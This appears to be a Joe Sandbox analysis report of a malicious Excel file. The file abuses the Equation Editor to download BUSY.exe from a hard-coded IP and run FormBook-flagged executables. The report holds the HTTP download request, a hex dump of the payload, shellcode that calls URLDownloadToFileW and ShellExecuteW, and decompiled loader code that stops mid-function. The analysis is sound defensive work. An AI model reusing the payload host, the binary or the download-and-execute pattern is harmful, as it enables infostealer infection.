May 13, 2022 16:42:07.008421898 CEST	49173	80	192.168.2.22	198.12.81.20

HTTP Request Dependency Graph

198.12.81.20

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	198.12.81.20	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 13, 2022 16:42:02.456495047 CEST	2	OUT	GET /busy/BUSY.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.81.20 Connection: Keep-Alive
May 13, 2022 16:42:02.572757959 CEST	3	IN	HTTP/1.1 200 OK Date: Fri, 13 May 2022 14:42:02 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17 Last-Modified: Fri, 13 May 2022 11:21:13 GMT ETag: "3e719-5dee2df4306a6" Accept-Ranges: bytes Content-Length: 255769 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@
May 13, 2022 16:42:02.572815895 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 b0 8a 7a 00 8d 45 a4 Data Ascii: U\}t+}FEuHzHPuuu@BSV5zEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
May 13, 2022 16:42:02.572873116 CEST	6	IN	Data Raw: 7a 00 e9 f9 16 00 00 8b 88 80 8b 7a 00 89 88 20 8b 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 20 8b 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 20 8b 7a 00 57 e9 31 16 00 00 8b 0d 70 7a 7a 00 8b 35 50 Data Ascii: zz zE4 z3;#MDE4 zW1pzz5P@;tuQEzz;PQjuP@nmjPEJ;tZj\VIf>ff;u9]tCFtuEuF;t=uu
May 13, 2022 16:42:02.572926998 CEST	7	IN	Data Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb Data Ascii: fuSjUY;YUu;\|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
May 13, 2022 16:42:02.572988033 CEST	9	IN	Data Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 1c 37 00 00 56 e8 97 3c 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 17 4b 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 d8 45 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40 Data Ascii: uGSVj7V<;j9]t!VK9]\|PuE;tEV$@4jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuU
May 13, 2022 16:42:02.573049068 CEST	10	IN	Data Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 6e 0e 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 Data Ascii: DujY@VUXuhWSunPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE!@ffM^h>j;YUfn9]M
May 13, 2022 16:42:02.573088884 CEST	12	IN	Data Raw: 08 e8 f8 37 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 47 09 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 Data Ascii: 7W4@MSSuuGu$@j;^}j^up@EVS#Y;=zUEi5z;\|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]
May 13, 2022 16:42:02.573137045 CEST	13	IN	Data Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 dc 3a 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d Data Ascii: tu@j:uuu@u@jVuu_^[U}ujhju@@E}uEF=zT@u @PEQPT@EPuD@EPhu,30y@y;rPjdQ@UV39ut
May 13, 2022 16:42:02.573175907 CEST	15	IN	Data Raw: 79 00 2b 35 60 ce 40 00 57 03 74 24 14 ff 15 f8 80 40 00 33 db 05 f4 01 00 00 3b f3 a3 ac 8a 7a 00 0f 8e 2a 01 00 00 ff 35 44 f7 79 00 e8 46 01 00 00 53 53 ff 35 60 ce 40 00 ff 35 1c a0 40 00 ff 15 60 81 40 00 89 35 40 f7 79 00 89 1d 30 f7 79 00 Data Ascii: y+5`@Wt$@3;z*5DyFSS5`@5@`@5@y0y0x8y@+Dy;07yWV=Dy5h@=l@9zt)9@zu!@yS+4y+D$`@0yYhh@-p@t@26\|j5p@+t!VU5@
May 13, 2022 16:42:02.573216915 CEST	16	IN	Data Raw: 72 50 0f b7 05 3e a3 40 00 99 0f a4 c2 10 c1 e0 10 8b d8 0f b7 05 3c a3 40 00 0f b7 0d 38 a3 40 00 99 0b d8 0f b7 05 3a a3 40 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c3 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 0a 4f 4f 81 ff 00 30 7b 00 73 e9 33 db Data Ascii: rP>@<@8@:@3;uW;tOO0{s30{E@rAfW&=Wh8{.,Wh@{#,]LzE!h,@V,th(@V,h@V+H{WV(@Vt h!
May 13, 2022 16:42:02.687007904 CEST	17	IN	Data Raw: 50 ff 74 24 2c ff 74 24 2c 68 00 00 00 80 57 56 68 80 00 00 00 ff 15 24 82 40 00 a3 68 1f 7a 00 57 e8 eb d4 ff ff 85 c0 74 08 6a 02 58 e9 bf 00 00 00 e8 c2 00 00 00 39 3d 40 8b 7a 00 0f 85 83 00 00 00 6a 05 ff 35 68 1f 7a 00 ff 15 50 82 40 00 68 Data Ascii: Pt$,t$,hWVh$@hzWtjX9=@zj5hzP@h<@vuh0@h5(@@SUWuSh@WS-dzz@zzWih@@WP5z,@jVj+Wt9=lzzNj.Bj"3_^

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 1980, Parent PID: 576

General

Target ID:	0
Start time:	16:42:16
Start date:	13/05/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f080000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 2576, Parent PID: 576

General

Target ID:	2
Start time:	16:42:40
Start date:	13/05/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 2372, Parent PID: 2576

General

Target ID:	4
Start time:	16:42:44
Start date:	13/05/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x400000
File size:	255769 bytes
MD5 hash:	029BBE98A216416EB698CA543A5C0830
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: idcqz.exePID: 2428, Parent PID: 2372

General

Target ID:	5
Start time:	16:42:47
Start date:	13/05/2022
Path:	C:\Users\user\AppData\Local\Temp\idcqz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Imagebase:	0xb50000
File size:	80384 bytes
MD5 hash:	51F62DEF6DC686B87CC0BAFC31685546
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: idcqz.exePID: 2544, Parent PID: 2428

General

Target ID:	6
Start time:	16:42:47
Start date:	13/05/2022
Path:	C:\Users\user\AppData\Local\Temp\idcqz.exe
Wow64 process (32bit):
Commandline:	C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Imagebase:
File size:	80384 bytes
MD5 hash:	51F62DEF6DC686B87CC0BAFC31685546
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 2576, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	51.3%
Total number of Nodes:	187
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 037903A2 Relevance: 6.1, APIs: 4, Instructions: 90
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(03790394), ref: 037903A2

Part of subcall function 037903BC: URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
Part of subcall function 037903BC: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
Part of subcall function 037903BC: ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 9e410da5812810ea819573611e6671a126a9b3eb79f652d015569224d09adc25
Instruction ID: 627d91cd667f6068ceb5b3aa431881b35b12a98fffb647ebaa4189b931d2ce18
Opcode Fuzzy Hash: 9e410da5812810ea819573611e6671a126a9b3eb79f652d015569224d09adc25
Instruction Fuzzy Hash: 8E21699286C3C16FEB1393302C6EB65BF246F67104F688ACFE1C2090E3E2985041C756

Uniqueness

Uniqueness Score: -1.00%

Function 03790316 Relevance: 4.6, APIs: 3, Instructions: 145
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 1c7901c4471e083daa73aa8b6e0eb38c1a7ea571af8d8655df4c016988981347
Instruction ID: 169fada721d1f8fc660c445aacdf3cd197d2e2a4f5f73c50de07dea388fc2669
Opcode Fuzzy Hash: 1c7901c4471e083daa73aa8b6e0eb38c1a7ea571af8d8655df4c016988981347
Instruction Fuzzy Hash: 90419A9686D3C1AFEB12D7302D6A665BF647F5B200F1C8BCFD5C20D0A3E2589145C356

Uniqueness

Uniqueness Score: -1.00%

Function 03790332 Relevance: 4.6, APIs: 3, Instructions: 136
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: f2807f76756f8fc4b041f247abd3dc8aafc58987c362963f7d389fda5a1837c8
Instruction ID: a3c0eac8e7a6ca979236c6118ae22de3fa93acfc47b480ca2b5784bb1c105224
Opcode Fuzzy Hash: f2807f76756f8fc4b041f247abd3dc8aafc58987c362963f7d389fda5a1837c8
Instruction Fuzzy Hash: 2141AB9686D3C16FEB12D7302D6E795BF646F57100F1C8BCF94C2090A3E2589105C356

Uniqueness

Uniqueness Score: -1.00%

Function 037903BC Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 8ed43dcfad24570c8e2fdfe7124c993424f27bf4bdc89aeb0ce8938b4c1aa23a
Instruction ID: 619c2c19f44140f9ff5f383fedbb5ef9710512d26ffaaa30f99f2165d7659b88
Opcode Fuzzy Hash: 8ed43dcfad24570c8e2fdfe7124c993424f27bf4bdc89aeb0ce8938b4c1aa23a
Instruction Fuzzy Hash: D021259295D3C1AFEF1397301C6EB65BF646F67600F688ACFE1C6094E3E6988041C762

Uniqueness

Uniqueness Score: -1.00%

Function 03790411 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413

Part of subcall function 0379042A: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
Part of subcall function 0379042A: ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: a7e0570f1347179f0ce845503f3c389b3411a84a9c7330d61a156d9ea7214428
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: E7F0279466D340E9FE21E3746C8EFAA6E149F93B00F540A9BB1554D0F3E5908400C215

Uniqueness

Uniqueness Score: -1.00%

Function 0379043F Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451

Part of subcall function 03790464: ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: df6da15d6dbd5d7abb9966837fd9b099409005ae42e4b511fe98236eb3aa5a3d
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 61014958975322E1FF30E6287C05BF9AB109B83700FCC8B53B994044F2D19490C3C319

Uniqueness

Uniqueness Score: -1.00%

Function 0379042A Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: c545204bd08bd5821d024aef2eec947685203153f532566fecef7fa5afaacd46
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: A201442457A302E1FF30E3246C89BEDBA84AB83714FA8866BF594484F2D2948482C21D

Uniqueness

Uniqueness Score: -1.00%

Function 03790464 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 03790469

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0379046B Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 0b46816777a20986c4d31584ef61bde720c94fe1239137ffdde7df94ab2623c7
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: BCD05271222502CFEB04DF04E984E12F3AAFFC9611B28C36AE0044B729C330EC92CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 037902FD Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(037902EB), ref: 037902FD

Memory Dump Source

Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ccfd489bce1c0a559d0adf8b208c79d6f7bd7d67aeda824a00c74952255f4900
Instruction ID: 556e7556ba1bb89199164925d2b216ce9edfedf90d5c4c7f2d9866842b851371
Opcode Fuzzy Hash: ccfd489bce1c0a559d0adf8b208c79d6f7bd7d67aeda824a00c74952255f4900
Instruction Fuzzy Hash: 3811E25542DBC08FFB02D7703AAA045FF60BE4F50075C87CFC4C14E1A3D264964A9382

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 2372, Parent PID: 2576COMMON

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.3%
Total number of Nodes:	1372
Total number of Limit Nodes:	22

Executed Functions

Function 00403646 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x7b3000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				E0040666E(0x7b3000, GetCommandLineW());
				_t94 = 0x7b3000;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				if( *0x7b3000 == _t233) {
					_t94 = 0x7b3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
